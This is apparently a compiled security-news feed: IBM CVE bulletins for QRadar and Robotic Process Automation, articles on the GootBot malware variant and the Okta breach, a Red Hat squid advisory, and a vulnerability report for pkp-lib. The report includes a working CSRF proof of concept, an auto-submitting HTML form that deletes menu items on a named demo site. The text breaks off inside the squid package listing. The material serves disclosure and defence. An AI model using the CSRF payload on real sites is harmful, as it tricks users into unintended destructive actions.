IBM QRadar SIEM 7.5.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  IBM X-Force ID:  267484.

**Security Bulletin**

  

**Summary**

IBM QRadar SIEM includes vulnerable components (e.g., framework libraries) that may be identified and exploited with automated tools. Additionally, a cross site scripting issue was found. These have been addressed in the update.

**Vulnerability Details**

**CVEID:**   CVE-2020-22218  
**DESCRIPTION:**   libssh2 is vulnerable to a denial of service, caused by an out-of-bounds read in the \_libssh2\_packet\_add function. By sending a specially crafted request, a remote attacker could exploit this vulnerability to cause a denial of service.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/266252 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2023-20593  
**DESCRIPTION:**   AMD Ryzen, Gen AMD EPYC Processors could allow a local authenticated attacker to obtain sensitive information, caused by a use-after-free flaw in the vzeroupper instruction. By conducting a cache timing attack using a specially crafted application, an attacker could exploit this vulnerability to obtain sensitive data used by other processes, such as passwords and encryption keys, at a rate of 30KB/sec from each CPU core.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/261343 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)

**CVEID:**   CVE-2023-35788  
**DESCRIPTION:**   Linux Kernel could allow a local authenticated attacker to gain elevated privileges on the system, caused by an off-by-one flaw in the fl\_set\_geneve\_opt fucntion. By sending a specially crafted request, an authenticated attacker could exploit this vulnerability to gain elevated privileges or cause a denial of service condition.  
CVSS Base score: 7.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/257458 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2022-44730  
**DESCRIPTION:**   Apache Batik is vulnerable to server-side request forgery, caused by improper input validation. By persuading a victim to open specially crafted SVG file, an attacker could exploit this vulnerability to conduct SSRF attack to probe user profile/data and send it directly as parameter to a URL.  
CVSS Base score: 5.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/264130 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2022-44729  
**DESCRIPTION:**   Apache Batik is vulnerable to server-side request forgery, caused by improper input validation. By persuading a victim to open specially crafted SVG file, an attacker could exploit this vulnerability to conduct SSRF attack to cause resource consumption and obtain sensitive information.  
CVSS Base score: 7.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/264129 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H)

**CVEID:**   CVE-2023-20900  
**DESCRIPTION:**   VMware Tools could allow a remote attacker to bypass security restrictions, caused by improper SAML token signature verification. By utilize man-in-the-middle attack techniques, an attacker could exploit this vulnerability to perform VMware Tools Guest Operations  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/264792 for the current score.  
CVSS Vector: (CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2023-3341  
**DESCRIPTION:**   ISC BIND is vulnerable to a denial of service, caused by a stack exhaustion flaw in control channel code. By sending a specially crafted message over the control channel, a remote attacker could exploit this vulnerability to cause named to terminate.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/266515 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2023-3899  
**DESCRIPTION:**   Red Hat Enterprise Linux could allow a local authenticated attacker to gain elevated privileges on the system, caused by improper authorization by the subscription-manager. By sending a specially crafted request through D-Bus interface com.redhat.RHSM1, an authenticated attacker could exploit this vulnerability to gain elevated privileges to an unconfined root.  
CVSS Base score: 7.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/264328 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2023-43057  
**DESCRIPTION:**   IBM QRadar SIEM is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  
CVSS Base score: 4.6  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/267484 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N)

**Affected Products and Versions**

**Affected Product(s)**

**Version(s)**

IBM QRadar SIEM

7.5 - 7.5.0 UP7

**Remediation/Fixes**

**IBM strongly encourages customers to update their systems promptly.**

**Product**

**Version**

**Remediation/First Fix**

IBM QRadar SIEM

7.5.0 

7.5.0 UP7 IF02

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

10 Nov 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSBQAC","label":"IBM Security QRadar SIEM"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"7.5.0","Edition":"","Line of Business":{"code":"LOB24","label":"Security Software"}}\]

CVE-2023-43057: Security Bulletin: IBM QRadar SIEM contains multiple vulnerabilities

IBM AIX's 7.3 Python implementation could allow a non-privileged local user to exploit a vulnerability to cause a denial of service.  IBM X-Force ID:  267965.

CVE-2023-45167

A new variant of the GootLoader malware called GootBot has been found to facilitate lateral movement on compromised systems and evade detection.
"The GootLoader group's introduction of their own custom bot into the late stages of their attack chain is an attempt to avoid detections when using off-the-shelf tools for C2 such as CobaltStrike or RDP," IBM X-Force researchers Golo Mühr and Ole

Endpoint Security / Malware

A new variant of the GootLoader malware called GootBot has been found to facilitate lateral movement on compromised systems and evade detection.

"The GootLoader group's introduction of their own custom bot into the late stages of their attack chain is an attempt to avoid detections when using off-the-shelf tools for C2 such as CobaltStrike or RDP," IBM X-Force researchers Golo Mühr and Ole Villadsen said.

"This new variant is a lightweight but effective malware allowing attackers to rapidly spread throughout the network and deploy further payloads."

GootLoader, as the name implies, is a malware capable of downloading next-stage malware after luring potential victims using search engine optimization (SEO) poisoning tactics. It's linked to a threat actor tracked as Hive0127 (aka UNC2565).

The use of GootBot points to a tactical shift, with the implant downloaded as a payload after a Gootloader infection in lieu of post-exploitation frameworks such as CobaltStrike."

Described as an obfuscated PowerShell script, GootBot is designed to connect to a compromised WordPress site for command and control and receive further commands.

Complicating matters further is the use of a unique hard-coded C2 server for each deposited GootBot sample, making it difficult to block malicious traffic.

"Currently observed campaigns leverage SEO-poisoned searches for themes such as contracts, legal forms, or other business-related documents, directing victims to compromised sites designed to look like legitimate forums where they are tricked into downloading the initial payload as an archive file," the researchers said.

The archive file incorporates an obfuscated JavaScript file, which, upon execution, fetches another JavaScript file that's triggered via a scheduled task to achieve persistence.

In the second stage, JavaScript is engineered to run a PowerShell script for gathering system information and exfiltrating it to a remote server, which, in turn, responds with a PowerShell script that's run in an infinite loop and grants the threat actor to distribute various payloads.

This includes GootBot, which beacons out to its C2 server every 60 seconds to fetch PowerShell tasks for execution and transmit the results of the execution back to the server in the form of HTTP POST requests.

Some of the other capabilities of GootBot range from reconnaissance to carrying out lateral movement across the environment, effectively expanding the scale of the attack.

"The discovery of the Gootbot variant highlights the lengths to which attackers will go to evade detection and operate in stealth," the researchers said. "This shift in TTPs and tooling heightens the risk of successful post-exploitation stages, such as GootLoader-linked ransomware affiliate activity."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New GootLoader Malware Variant Evades Detection and Spreads Rapidly

By Deeba Ahmed
GootBot: New Gootloader Variant Evades Detection with Stealthy Lateral Movement.
This is a post from HackRead.com Read the original post: IBM X-Force Discovers Gootloader Malware Variant- GootBot

The original Gootloader malware was used by numerous threat groups, including ransomware affiliates and in additional payloads like SystemBC and IcedID.

IBM X-Force has discovered a new variant of the notorious **Gootloader malware**, dubbed GootBot. This malware performs stealthy lateral movement, which complicates the detection or blocking of the campaign within enterprise networks.

According to the **blog post** authored by Golo Mühr and Ole Villadsen, the Gootloader group implements their custom bot in the latter stages of this attack chain to evade detection, using off-the-shelf tools for establishing C2 communication, such as RDP or CobaltStrike.

Gootloader malware was initially used only as an initial access tool and evolved considerably over time to include GootBot, a lightweight obfuscated PS script. It is downloaded after the Gootloader infection and receives commands via C2 through encrypted PowerShell scripts.

For your information, the Gootloader group (aka UNC2565 or Hive0127) first surfaced in 2014 and focused more on SEO poisoning techniques and compromised WordPress websites to distribute the Gootkit-based Gootloader malware. Tanium’s director of endpoint security research, Melissa Bischoping, explained how **SEO poisoning** works. 

One of the hacked websites used in delivered Gootloader malware (Image: Sophos)

“SEO poisoning drives users to malicious payloads by manipulating the search results for key terms. Most security awareness training focuses heavily on phishing and other methods where an attacker sends something to the user. There’s a false sense of security that people place in search result top rankings and an outdated mindset that the lock on the address bar means a site is safe.”

Hackread.com has been following the Gootloader group’s activities since its emergence. The group frequently targets business-related online searchers like queries about legal contracts, creating legit-looking websites, and positioning them on the first page of search results. Once the user visits the page, they entice them into downloading archive files, which appear harmless and relevant to their queries but actually contain Gootloader malware.

In March 2021, Sophos cybersecurity firm **confirmed** that Gootloader has evolved into a sophisticated loader framework from serving as an initial access point, revealing that its delivery method had expanded beyond the Gootkit malware family. As an initial access point, Gootloader malware was used by numerous threat groups, including ransomware affiliates and in additional payloads like SystemBC and IcedID.  

GootBot is a novel Gootloader variant. It is a PowerShell payload encapsulating a single C2 server address. Its strings use a replacement key to conduct mild obfuscation. The malware, just like Gootloader, sends a GET request to the C2 server, requesting PowerShell tasks, and gets a string comprising a Base64-encoded payload.

The last 8 digits of the code are the task’s name. It then decodes the payload and injects it into the script block before executing it. The payload runs asynchronously, maintaining a default beaconing interval of 60 seconds. When it receives a C2 task, the next loop iteration starts, and for completed jobs, the results are returned.

GootBot is designed for lateral movement within the network, noted X-Force researchers. Its C2 infrastructure can quickly generate numerous GootBot payloads for distribution, each having a unique C2 address, and can cause multiple infections of the same host. It also runs a reconnaissance script and contains a unique GootBot ID for the host.

This effective malware lets attackers swiftly propagate across the compromised network to deploy additional malicious software. Unlike Gootloader, GootBot spreads through infected domains to reach the domain controller. This indicates a shift in attack tactics from Gootloader operators and enhances the success rate of post-exploitation stages, including Gootloader-based ransomware affiliate activity.

The malware is capable of extracting domain user name, and OS details from the registry key, checks for x86 dir and int ptr size if 64bit architecture is detected, and obtains information about domain controllers from registry and ENV var, SID, local IP address, hostname, and running processes. The data gets formatted with the specified ID.

The emergence of the GootBot variant highlights that attackers are employing sophisticated methods to stay undetected and spread laterally across the network. Lateral-movement scripts are possible through various techniques, such as WinRM, SMB, and WinAPI calls, to spread the payload to other hosts.

Infection diagram

Organizations must implement advanced security mechanisms, including endpoint detection and response (EDR) solutions and regularly updating software to prevent the threat. Bugcrowd cybersecurity firm’s founder and chief strategy officer, **Casey Ellis**, shared the following statement with Hackread.com regarding the current Gootloader campaign.

“This all strikes me as a very organized and thoughtful initial access broker (IAB). Their watering-hole style deployment of malicious SEO isn’t particularly targeted, however, it suits the opportunistic attack model of an IAB quite well. For defenders, it’s important to remember that organized cybercrime is continuing to evolve, stratify, and mature and that the threat actor behaviours now include this type of long, wide game.”

Keeper Security’s CEO and co-founder, **Darren Guccione**, in an exclusive statement shared with Hackread.com, noted that it is hard for innocent users to distinguish between authentic and fabricated search results, which makes SEO poisoning so successful.

“Innocent people who are not trained on SEO (Search Engine Optimization) and SEO-related attack vectors, including SEO poisoning, generally focus on the aesthetics of the search results page they are familiar with such as the domain name and the logos displayed. Often, threat actors will use language like “Official Website” to lure people into clicking a dangerous link or visiting a spoofed site that can download Gootloader or other malware onto their device.”

However, some scrutiny can prove beneficial in detecting malicious websites, said Guccione. “Phony or spoofed websites will usually have a different website address than the official company name and can also use different domain extensions than the one for the legitimate website. The majority of popular websites use the domain extension .com,” explained Guccione. 

“If you visit a site, pay special attention to the domain itself and if it appears to be abnormally long or unrecognizable based on your normal search activity, it’s best to ignore it – and not click on any link. Online tools such as a Google Transparency Report can also be used to determine whether a site is safe.”

1.  Google Algorithm Updates vs SEO Strategies
2.  How Can SEO Help Increase Website Security?
3.  Google Indexed Trove of Bard AI User Chats in Search Results
4.  Ad-blocker Chrome extension AllBlock injected ads in Google searches
5.  Malicious Chrome, Edge extensions manipulating Google search results

IBM X-Force Discovers Gootloader Malware Variant- GootBot

Cross-Site Request Forgery in GitHub repository pkp/pkp-lib prior to 3.3.0-16.



Description

CSRF Delete Navigation Menu Items

Proof of Concept

1 .Attack sends fake requests to users

    <html>
       <body>    
     <form action="https://demo.publicknowledgeproject.org/ojs3/testdrive/index.php/testdrive-journal/$$$call$$$/grid/navigation- 
       menus/navigation-menu-items-grid/delete-navigation-menu-item">      
      <input type="hidden" name="navigationMenuItemId" value="330" />    
      <input type="hidden" name="csrfToken" value="" />     
      <input type="submit" value="Submit request" />
     </form>
     <script>
           history.pushState('', '', '/');
            document.forms[0].submit();
           </script>
        </body>
      </html>
    

2 .User click, deletes unwanted Navigation Menu Items

Payload Poc

https://drive.google.com/file/d/15cjZ2oBeBmUx-C9\_kRqBXKMXLX8LU5Ew/view?usp=sharing

Video Poc

https://drive.google.com/file/d/1Bp1M3ifN9rXdxhjfyAIibmy0QFhYluEu/view?usp=sharing

**Impact**

Trick users to do unintended actions.

CVE-2023-5900: CSRF Delete Navigation Menu Items in pkp-lib

By Waqas
Some of the most prominent victims of the data breach include Cloudflare, 1Password, and BeyondTrust.
This is a post from HackRead.com Read the original post: Okta Breach Linked to Employee’s Google Account, Affects 134 Customers

Okta’s investigation determined the breach to be associated with a Google account belonging to one of the company’s employees.

In a recent update following the initial data breach announcement made in October 2023, Okta, a prominent identity and access management (IAM) provider, disclosed that the number of affected customers has now reached 134. This breach enabled threat actors to gain unauthorized access to files.

“Some of these files were HAR files that contained session tokens which could in turn be used for session hijacking attacks,” David Bradbury, Okta’s chief security officer explained in Friday’s November 4th update.

Between September 28 and October 17, 2023, Okta encountered a sophisticated attack, wherein a threat actor accessed Okta’s support case management system by compromising a stolen account. Afterwards, the threat actor gained the ability to view, update support cases, and extract sensitive data, which included session tokens.

On October 19, Okta became aware of the breach following a notification from one of its customers, BeyondTrust, regarding suspicious activities. Among the prominent customers affected by the breach are Cloudflare and 1Password. Pedro Canahuati, the CTO of 1Password, disclosed the incident, confirming that threat actors were unable to access or extract user data during the attack.

****Google Account Connection****

Originally, the incident was thought to occur as a threat actor accessed an IT employee’s Okta session token by leveraging a stolen credential, thus gaining entry into 1Password’s Okta administrative portal. However, Bradbury later revealed that the investigation determined the breach to be associated with a Google account belonging to one of the company’s employees.

“Okta Security identified that an employee had signed-in to their personal Google profile on the Chrome browser of their Okta-managed laptop,” Bradbury said. “The username and password of the service account had been saved into the employee’s personal Google account. The most likely avenue for exposure of this credential is the compromise of the employee’s personal Google account or personal device.”

As to why it took two weeks for Okta to address the issue, Bradbury further explained that “Okta didn’t find any suspicious downloads in their system logs.” They noted that when someone looks at files attached to a support case, there’s a special record in their logs. But if a person goes directly to the Files section in the customer support system, it creates a different record. The attackers used this method in their attack.

“Okta first looked into access to support cases and then checked the logs related to those cases. On October 13, 2023, BeyondTrust gave Okta Security an IP address linked to the attackers. With this information, Okta found more file access events tied to the compromised account,” said Bradbury.

In a comment to Hackread.com, Tal Skverer, Research Team Lead at Astrix Security, discussed the use of personal accounts on devices issued by the company stating that “Service accounts skip security measures that normal accounts are subject to, such as MFA, therefore; their credentials are extremely vulnerable.”

“It is with utmost importance that service accounts follow the least privilege principle. Skverer emphasised. “To limit their permissions, their usage should be limited to very unique functionalities.”

The Okta breach is a major concern for the cybersecurity community, as Okta is a trusted IAM provider for many organizations, including Fortune 500 companies and government agencies. The breach also highlights the growing sophistication of threat actors and the need for organizations to take steps to protect their data from increasingly targeted attacks.

Nevertheless, the latest security breach at Okta serves as the second cyberattack on the company. In March 2022, LAPSUS$ hackers claimed to have breached Okta and Microsoft after leaking a trove of their data on Telegram.

****What Organizations Can Do to Protect Themselves****

Organizations can take a number of steps to protect themselves, including:

*   **Implement strong password policies and require users to use multi-factor authentication (MFA).** MFA adds an extra layer of security to user accounts by requiring users to provide a second form of authentication, such as a code from their phone, in addition to their password.
*   **Regularly update security software and patches.** Software developers release security updates to patch known vulnerabilities. By regularly updating their software and patches, organizations can help to reduce the risk of being exploited by attackers.
*   **Educate employees about cybersecurity best practices.** Employees should be trained on how to identify and avoid phishing attacks, and how to protect their devices and data.
*   **Monitor their systems for suspicious activity.** Organizations should have systems in place to monitor their systems for suspicious activity, such as unusual login attempts or data exfiltration.

1.  IBM Notifies Janssen CarePath Customers of Data Breach
2.  Human Error: Casio ClassPad Data Breach Impacting 148 Countries
3.  Sony Data Breach via MOVEit Vulnerability Affects Thousands in US
4.  Fake Bitwarden Password Manager Website Drops Windows ZenRAT
5.  Kroll SIM-Swapping Attack Causes Data Breach at 3 Top Crypto Firms
6.  Passwords by Kaspersky Password Manager exposed to brute-force attack

Okta Breach Linked to Employee’s Google Account, Affects 134 Customers

A vulnerability in IBM Robotic Process Automation and IBM Robotic Process Automation for Cloud Pak 21.0.0 through 21.0.7.10, 23.0.0 through 23.0.10 may result in access to client vault credentials.  This difficult to exploit vulnerability could allow a low privileged attacker to programmatically access client vault credentials.  IBM X-Force ID:  268752.

  

**Summary**

A vulnerability in IBM Robotic Process Automation may result in access to client vault credentials. This difficult to exploit vulnerability could allow a low privileged attacker to programmatically access client vault credentials.

**Vulnerability Details**

**CVEID:**   CVE-2023-45189  
**DESCRIPTION:**   A vulnerability in IBM Robotic Process Automation may result in access to client vault credentials. This difficult to exploit vulnerability could allow a low privileged attacker to programmatically access client vault credentials.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/268752 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM Robotic Process Automation for Cloud Pak

21.0.0 - 21.0.7.10, 23.0.0 - 23.0.10

IBM Robotic Process Automation

21.0.0 - 21.0.7.10, 23.0.0 - 23.0.10

**Remediation/Fixes**

**IBM strongly recommends addressing the vulnerability now.**

**Product(s)**

**Version(s) number and/or range** 

**Remediation/Fix/Instructions**

IBM Robotic Process Automation

21.0.0 - 21.0.7.10

Download 21.0.7.11 or higher and follow these instructions.

IBM Robotic Process Automation for Cloud Pak

21.0.0 - 21.0.7.10

Update to 21.0.7.11 or higher using the following instructions. 

IBM Robotic Process Automation

23.0.0 - 23.0.10

Download 23.0.11 or higher and follow these instructions.

IBM Robotic Process Automation for Cloud Pak

23.0.0 - 23.0.10

Update to 23.0.11 or higher using the following instructions.

**Workarounds and Mitigations**

None.

**References**

Off

**Acknowledgement**

**Change History**

01 Nov 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSC50T","label":"IBM Robotic Process Automation"},"Component":"","Platform":\[{"code":"PF040","label":"RedHat OpenShift"},{"code":"PF033","label":"Windows"}\],"Version":"21.0.0 - 21.0.7.10, 23.0.0 - 23.0.10","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2023-45189: Security Bulletin: A vulnerability in IBM Robotic Process Automation may result in access to client vault credentials (CVE-2023-45189).

Squid is vulnerable to Denial of Service,  where a remote attacker can perform DoS by sending ftp:// URLs in HTTP Request messages or constructing ftp:// URLs from FTP Native input.

Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   OpenShift Dev Spaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Quarkus

**Integration and Automation**

All Products

Issued:

2023-11-02

Updated:

2023-11-02

**RHSA-2023:6266 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Critical: squid security update

**Type/Severity**

Security Advisory: Critical

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

An update for squid is now available for Red Hat Enterprise Linux 9.  

Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Squid is a high-performance proxy caching server for web clients, supporting FTP, Gopher, and HTTP data objects.  

Security Fix(es):  

*   SQUID-2023:3 squid: Denial of Service in HTTP Digest Authentication (CVE-2023-46847)
*   SQUID-2023:1 squid: Request/Response smuggling in HTTP/1.1 and ICAP (CVE-2023-46846)
*   SQUID-2023:5 squid: denial of Service in FTP (CVE-2023-46848)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Solution**

For details on how to apply this update, which includes the changes described in this advisory, refer to:  

https://access.redhat.com/articles/11258

After installing this update, the squid service will be restarted automatically.

**Affected Products**

*   Red Hat Enterprise Linux for x86\_64 9 x86\_64
*   Red Hat Enterprise Linux for x86\_64 - Extended Update Support 9.2 x86\_64
*   Red Hat Enterprise Linux Server - AUS 9.2 x86\_64
*   Red Hat Enterprise Linux for IBM z Systems 9 s390x
*   Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 9.2 s390x
*   Red Hat Enterprise Linux for Power, little endian 9 ppc64le
*   Red Hat Enterprise Linux for Power, little endian - Extended Update Support 9.2 ppc64le
*   Red Hat Enterprise Linux for ARM 64 9 aarch64
*   Red Hat Enterprise Linux for ARM 64 - Extended Update Support 9.2 aarch64
*   Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.2 ppc64le
*   Red Hat Enterprise Linux for x86\_64 - Update Services for SAP Solutions 9.2 x86\_64
*   Red Hat Enterprise Linux Server for ARM 64 - 4 years of updates 9.2 aarch64
*   Red Hat Enterprise Linux Server for IBM z Systems - 4 years of updates 9.2 s390x

**Fixes**

*   BZ - 2245910 - CVE-2023-46846 SQUID-2023:1 squid: Request/Response smuggling in HTTP/1.1 and ICAP
*   BZ - 2245916 - CVE-2023-46847 SQUID-2023:3 squid: Denial of Service in HTTP Digest Authentication
*   BZ - 2245919 - CVE-2023-46848 SQUID-2023:5 squid: denial of Service in FTP

**Red Hat Enterprise Linux for x86\_64 9**

SRPM

squid-5.5-5.el9\_2.1.src.rpm

SHA-256: 7fa87ba53df94437a7b1a3e457e7b607cfcbb01e46e4dd9ea2a242400aee5378

x86\_64

squid-5.5-5.el9\_2.1.x86\_64.rpm

SHA-256: ed12a36d09c972d9786334fb79b3af03db66a572b559fd0c00629e178de4f491

squid-debuginfo-5.5-5.el9\_2.1.x86\_64.rpm

SHA-256: 18b16426a651fc55f4eba4629d9ea33e08994a77b809f4316929093fe6c6ca3c

squid-debugsource-5.5-5.el9\_2.1.x86\_64.rpm

SHA-256: 5b961038cd20090637fa915a096e09360736de9ef2f7acc94031b45aaf46f9d5

**Red Hat Enterprise Linux for x86\_64 - Extended Update Support 9.2**

SRPM

squid-5.5-5.el9\_2.1.src.rpm

SHA-256: 7fa87ba53df94437a7b1a3e457e7b607cfcbb01e46e4dd9ea2a242400aee5378

x86\_64

squid-5.5-5.el9\_2.1.x86\_64.rpm

SHA-256: ed12a36d09c972d9786334fb79b3af03db66a572b559fd0c00629e178de4f491

squid-debuginfo-5.5-5.el9\_2.1.x86\_64.rpm

SHA-256: 18b16426a651fc55f4eba4629d9ea33e08994a77b809f4316929093fe6c6ca3c

squid-debugsource-5.5-5.el9\_2.1.x86\_64.rpm

SHA-256: 5b961038cd20090637fa915a096e09360736de9ef2f7acc94031b45aaf46f9d5

**Red Hat Enterprise Linux Server - AUS 9.2**

SRPM

squid-5.5-5.el9\_2.1.src.rpm

SHA-256: 7fa87ba53df94437a7b1a3e457e7b607cfcbb01e46e4dd9ea2a242400aee5378

x86\_64

squid-5.5-5.el9\_2.1.x86\_64.rpm

SHA-256: ed12a36d09c972d9786334fb79b3af03db66a572b559fd0c00629e178de4f491

squid-debuginfo-5.5-5.el9\_2.1.x86\_64.rpm

SHA-256: 18b16426a651fc55f4eba4629d9ea33e08994a77b809f4316929093fe6c6ca3c

squid-debugsource-5.5-5.el9\_2.1.x86\_64.rpm

SHA-256: 5b961038cd20090637fa915a096e09360736de9ef2f7acc94031b45aaf46f9d5

**Red Hat Enterprise Linux for IBM z Systems 9**

SRPM

squid-5.5-5.el9\_2.1.src.rpm

SHA-256: 7fa87ba53df94437a7b1a3e457e7b607cfcbb01e46e4dd9ea2a242400aee5378

s390x

squid-5.5-5.el9\_2.1.s390x.rpm

SHA-256: cf74de6cbfdb39db15256dded5590a7b394f74c95d93391bb2b222baa45dfddd

squid-debuginfo-5.5-5.el9\_2.1.s390x.rpm

SHA-256: 53ec7c67112ca23a5884710ebfb6ca574150aa24037ffe008af1e9a216bc5bc6

squid-debugsource-5.5-5.el9\_2.1.s390x.rpm

SHA-256: fcdf1fd8cf2c420b948fa52c9f80b2a7797019eaac8609ec2b7473b8232bb032

**Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 9.2**

SRPM

squid-5.5-5.el9\_2.1.src.rpm

SHA-256: 7fa87ba53df94437a7b1a3e457e7b607cfcbb01e46e4dd9ea2a242400aee5378

s390x

squid-5.5-5.el9\_2.1.s390x.rpm

SHA-256: cf74de6cbfdb39db15256dded5590a7b394f74c95d93391bb2b222baa45dfddd

squid-debuginfo-5.5-5.el9\_2.1.s390x.rpm

SHA-256: 53ec7c67112ca23a5884710ebfb6ca574150aa24037ffe008af1e9a216bc5bc6

squid-debugsource-5.5-5.el9\_2.1.s390x.rpm

